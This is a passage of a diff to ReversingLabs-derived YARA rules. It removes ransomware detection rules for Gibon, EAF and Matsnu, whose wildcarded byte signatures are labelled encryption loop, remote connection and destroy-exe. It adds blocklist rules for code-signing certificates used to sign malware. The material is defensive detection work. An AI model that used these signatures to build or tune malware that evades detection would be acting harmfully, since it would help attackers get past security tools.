-            74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 49 ?? 33 DB 39 5C 24 ?? 0F 86
-            ?? ?? ?? ?? 8B 74 24 ?? 83 C6 ?? 83 7E ?? ?? 75 ?? 8B 06 6A ?? 68 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 6A ?? 89 44 24 ?? FF D7 8B F8 85 FF 74 ?? FF 74 24 ?? 68 ?? ?? ?? ?? 57 FF
-            15 ?? ?? ?? ?? 8B 55 ?? 83 C4 ?? 8B CF 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ??
-            6A ?? 57 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? F6 46 ?? ?? 74 ?? FF 75 ?? 8B 54 24 ??
-            8D 4E ?? E8 ?? ?? ?? ?? 83 C4 ?? 43 83 C6 ?? 3B 5C 24 ?? 72 ?? 8D 44 24 ?? C7 44 24
-            ?? ?? ?? ?? ?? 50 FF 74 24 ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ?? FF
-        }
-		$enum_resources_2 = {
-            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 74 24 ?? FF 74 24 ?? FF
-            15 ?? ?? ?? ?? 8D 44 24 ?? 50 56 6A ?? 6A ?? 6A ?? FF D3 8B F0 85 F6 0F 85 ?? ?? ??
-            ?? 8B 74 24 ?? 8D 44 24 ?? 50 56 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ??
-            C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 9B ?? ?? ?? ??
-            33 DB 39 5C 24 ?? 0F 86 ?? ?? ?? ?? 83 C6 ?? 90 83 7E ?? ?? 75 ?? 8B 06 6A ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 89 44 24 ?? FF D7 8B F8 85 FF 74 ?? FF 74 24 ?? 68 ??
-            ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 55 ?? 83 C4 ?? 8B CF 6A ?? E8 ?? ?? ?? ?? 83 C4 ??
-            68 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? F6 46 ?? ?? 74 ?? FF 75 ?? 8B 54 24 ?? 8D
-            4E ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 3D ?? ?? ?? ?? 43 83 C6 ?? 3B 5C 24 ?? 72 ?? 8B 74
-            24 ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 56 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ??
-            50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 74 24
-            ?? FF 15 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 8B
-            C6 5E 5B 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $enum_resources_* ) ) and ( $find_files ) and ( all of ( $encrypt_files_* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Booz Allen Hamilton Inc." and pe.signatures [ i ] . serial == "40:f5:66:0a:90:30:1e:7a:8a:8c:3b:42" and 1641833688 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Gibon : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0400C7614F86D75Fe4Ee3F6192B6Feda : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Gibon ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3f1a5bee-8fc0-5596-b898-e97073731930"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "500c9604-cc07-52b1-8c46-09894d132205"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Gibon.yara#L1-L122"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12140-L12156"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "cace0f35529307487f39aace6ae8989c7b878f82ebe890b256dfac563551a099"
+		logic_hash = "47735267e9a0fb8107f6c4008bacc8aada1705f6714a0447dacc3928fc20cad6"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Gibon"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_server_connection_1_0 = {
-            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
-            ?? 64 A1 ?? ?? ?? ?? 50 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45
-            ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? BA ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85
-            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ??
-            ?? ?? E9 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ??
-            6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 B9 ?? ?? ?? ?? 83 FE ?? 75 ?? BA ?? ?? ?? ?? E9
-            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? 6A ?? 66 89 85 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 56 FF 15 ?? ?? ?? ?? 8B
-            3D ?? ?? ?? ?? 85 C0 79 ?? FF D7 50 51 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B 43 ??
-            83 C0 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 7B ?? ?? 8D 43 ?? FF 73 ?? 0F 43 43 ?? 8D 8D ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
-        }
-		$remote_server_connection_1_1 = {
-            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ??
-            ?? ?? ?? 8B 53 ?? 8D 4B ?? 83 FA ?? 0F 43 4B ?? 8D 41 ?? 89 85 ?? ?? ?? ?? 90 8A 01
-            41 84 C0 75 ?? 2B 8D ?? ?? ?? ?? 8D 43 ?? 6A ?? 83 FA ?? 51 0F 43 43 ?? 50 56 FF 15
-            ?? ?? ?? ?? 85 C0 79 ?? FF D7 50 51 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 8B C8 E8 ?? ?? ?? ?? EB ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ??
-            83 F8 ?? 0F 85 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? BE ?? ?? ?? ?? 8B 43 ?? 83 F8 ?? 72 ?? 8B 4B ?? 40 3D ?? ?? ?? ?? 72
-            ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82
-            ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 8B 4D
-            ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D 8B E3 5B C3
-        }
-		$encryption_loop_1_0 = {
-            66 8B 01 66 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EE ?? 75 ?? C6 85 ?? ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 8B 51 ?? 83 CA ??
-            8B C2 83 C8 ?? 83 79 ?? ?? 0F 45 C2 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 32 C0 0F 85 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 C7 45 ?? ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? 83 CB ?? 68 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? 8B D7 8B 9D ?? ?? ?? ?? 83 CB ?? 83 7F ?? ?? 89 9D ?? ?? ?? ?? 89
-            9D ?? ?? ?? ?? 72 ?? 8B 17 83 78 ?? ?? 8B C8 72 ?? 8B 08 8B 70 ?? 3B 77 ?? 75 ?? 85
-            F6 0F 84
-        }
-		$encryption_loop_1_1 = {
-            66 8B 01 66 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EE ?? 75 ?? C6 85 ?? ?? ?? ?? ?? EB ??
-            32 C0 74 ?? C6 85 ?? ?? ?? ?? ?? EB ?? C6 85 ?? ?? ?? ?? ?? F6 C3 ?? 74 ?? 83 E3 ??
-            8D 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74 ?? 83 E3 ?? 8D 8D ??
-            ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74 ?? 83 E3 ?? 8D 8D ?? ?? ?? ??
-            89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74 ?? 83 E3 ?? 8D 8D ?? ?? ?? ?? 89 9D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 32 C0 75 ?? 83 E3 ?? 8D 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 32 C0 C7 45 ?? ?? ?? ?? ?? 75 ?? 83 E3 ?? 8D 8D ?? ?? ?? ?? 89 9D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 51 FF B5 ?? ?? ?? ?? BA
-            ?? ?? ?? ?? C6 45 ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 95
-        }
-		$encryption_loop_1_2 = {
-            57 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ??
-            ?? ?? ?? C3 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 FF B5
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E
-            5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 51 FF B5 ?? ?? ?? ?? BA ?? ?? ?? ?? 51
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 69 0F ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ??
-            ?? ?? BA ?? ?? ?? ?? 03 48 ?? 8D 85 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? 85 C0 74 ?? BA
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
-        }
-		$encryption_loop_1_3 = {
-            69 37 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 03 70 ?? E8 ?? ?? ?? ?? 8B 95 ??
-            ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 81 CB ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 78 ?? 8D
-            4A ?? 89 08 8D 4A ?? 89 48 ?? 8D 4A ?? 89 48 ?? 8D 4A ?? 89 48 ?? 8D 4A ?? 89 48 ??
-            B9 ?? ?? ?? ?? F3 A5 66 A5 C7 80 ?? ?? ?? ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ??
-            ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            C6 45 ?? ?? 8B B5 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 56 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4
-            ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B BD ??
-            ?? ?? ?? 8B 8D ?? ?? ?? ?? FF 07 8B 07 89 41 ?? 69 17 ?? ?? ?? ?? 8B 41 ?? 80 A4 02
-            ?? ?? ?? ?? ?? 8B 01 48 39 07 75 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F
-            84 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8A 11 8B
-            C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $remote_server_connection_1_0 and $remote_server_connection_1_1 and ( all of ( $encryption_loop_1_* ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "StackUp ApS" and pe.signatures [ i ] . serial == "04:00:c7:61:4f:86:d7:5f:e4:ee:3f:61:92:b6:fe:da" and 1626393601 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_EAF : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_E573D9C8B403C41Bd59Ffa0A8Efd4168 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects EAF ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6903030e-b1a1-5238-b377-ce8e4b18d3f3"
-		date = "2022-07-22"
-		modified = "2022-07-22"
+		id = "2e799dd9-d143-55a7-9d07-d5f289477b24"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.EAF.yara#L1-L89"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12158-L12176"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3d10c852f95e8aa9bcd3543b96650b98ac57bcd2aa2b374e0badb63b5a4c0396"
+		logic_hash = "425126b90fe2ab7c1ec7bf2fd5a91e4438a81992f20f99ed87ec62e7f20043cd"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "EAF"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            00 03 28 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 39 ?? ?? ?? ?? 00 7E ??
-            ?? ?? ?? 0C 03 28 ?? ?? ?? ?? 0D 03 28 ?? ?? ?? ?? 13 ?? 1E 8D ?? ?? ?? ?? 25 16 11 ??
-            A2 25 17 72 ?? ?? ?? ?? A2 25 18 7E ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 25 1A 28 ??
-            ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 25 1C 09 A2 25 1D 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ??
-            13 ?? 02 03 11 ?? 08 28 ?? ?? ?? ?? 13 ?? 11 ?? 2D ?? 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            2B ?? 16 13 ?? 11 ?? 2C ?? 00 00 03 11 ?? 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ?? 00
-            00 00 DE ?? 26 00 00 DE ?? 2A
-        }
-		$encrypt_files_p2 = {
-            00 03 19 73 ?? ?? ?? ?? 0A 00 04 18 73 ?? ?? ?? ?? 0B 00 06 16 6A 6F ?? ?? ?? ?? 00 28
-            ?? ?? ?? ?? 0C 00 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 05 09 73 ??
-            ?? ?? ?? 13 ?? 00 08 17 6F ?? ?? ?? ?? 00 08 18 6F ?? ?? ?? ?? 00 08 11 ?? 1F ?? 6F ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 00 08 11 ?? 1F ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 08 6F ??
-            ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 00 20 ?? ?? ?? ?? 13 ?? 11 ?? 8D ?? ?? ?? ?? 13 ?? 16
-            13 ?? 00 06 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? FE 02 16 FE 01 13
-            ?? 11 ?? 2C ?? 00 11 ?? 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 00 00 2B ?? 11 ?? 20 ?? ?? ?? ??
-            32 ?? 11 ?? 20 ?? ?? ?? ?? FE 02 16 FE 01 2B ?? 16 13 ?? 11 ?? 2C ?? 00 11 ?? 11 ?? 16
-            11 ?? 6F ?? ?? ?? ?? 00 00 2B ?? 11 ?? 20 ?? ?? ?? ?? 32 ?? 11 ?? 20 ?? ?? ?? ?? FE 02
-            16 FE 01 2B ?? 16 13 ?? 11 ?? 2C ?? 00 11 ?? 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 00 00 2B ??
-            00 07 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 11 ?? 58 13 ?? 00 11 ?? 16 FE 03 13 ??
-            11 ?? 3A ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ??
-            00 DC 00 DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 00 DE ?? 08 2C ?? 08 6F ?? ?? ??
-            ?? 00 DC 07 6F ?? ?? ?? ?? 00 00 DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 06 6F ?? ?? ??
-            ?? 00 00 DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? 00 DC 03 28 ?? ?? ?? ?? 00 17 13 ?? DE ?? 26
-            00 16 13 ?? DE ?? 11 ?? 2A
-        }
-		$find_files_p1 = {
-            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 16 0C 38 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0D 00 09 06 08 9A
-            28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 08 9A 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 09 FE 06 ??
-            ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 2C ?? 11 ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 11 ?? 7E ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 2B ?? 16 13 ?? 11 ?? 2C ?? 00 7E ?? ?? ?? ?? 06 08 9A 6F ?? ?? ?? ?? 00 00 00 08 17
-            58 0C 08 06 8E 69 FE 04 13 ?? 11 ?? 3A ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 16
-            13 ?? 2B ?? 00 07 11 ?? 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 07 11 ?? 9A 72 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 2C ?? 07 11 ?? 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 07 11 ?? 9A 72
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 2B ?? 16 13 ?? 11 ?? 2C ?? 00 07 11 ?? 9A 28 ?? ?? ?? ?? 00
-            00 00 11 ?? 17 58 13 ?? 11 ?? 07 8E 69 FE 04 13 ?? 11 ?? 2D ?? 00 DE ?? 26 00 00 DE ??
-            2A
-        }
-		$find_files_p2 = {
-            00 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 73 ?? ?? ?? ?? 0C 08 06 07 9A 7D ?? ?? ?? ?? 00 08 7B
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 08 7B ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 2B ?? 16 0D 09 2C ?? 00 08 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 00 00 00 07 17 58 0B 07 06 8E 69 32 ?? 00 DE ?? 26 00 00 DE ?? 2A
-        }
-		$destroy_exe_file = {
-            00 1F ?? 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 0B 7E ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 0C 7E ??
-            ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 08 72 ?? ?? ?? ?? 1B 8D ??
-            ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 06 A2 25 18 72 ?? ?? ?? ?? A2 25 19 28 ?? ?? ??
-            ?? A2 25 1A 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00 00
-            DE ?? 26 00 00 DE ?? 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $destroy_exe_file )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\"VERONIKA 2\" OOO" and ( pe.signatures [ i ] . serial == "00:e5:73:d9:c8:b4:03:c4:1b:d5:9f:fa:0a:8e:fd:41:68" or pe.signatures [ i ] . serial == "e5:73:d9:c8:b4:03:c4:1b:d5:9f:fa:0a:8e:fd:41:68" ) and 1563148800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Matsnu : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_B06Bc166Fc765Dacd2F7448C8Cdd9205 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Matsnu ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2f0bddd5-bd48-5d38-84f4-2dbccbe04a46"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "4b27c958-58f1-5fbd-8a39-aedfe4dafe39"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Matsnu.yara#L1-L116"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12178-L12196"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "76ef1b4a292f27ccd904e80f0279a7a327f7399a21f2266ef3ea959e5339ffac"
+		logic_hash = "2c47166f02c7f94bb4f82296e3220ff7ca3c6c53566d855b2fe77cb842a5fb43"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Matsnu"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection = {
-            55 89 E5 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C6 45 ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5B 8D 83 ?? ?? ?? ?? 8B 00 6A ?? 50
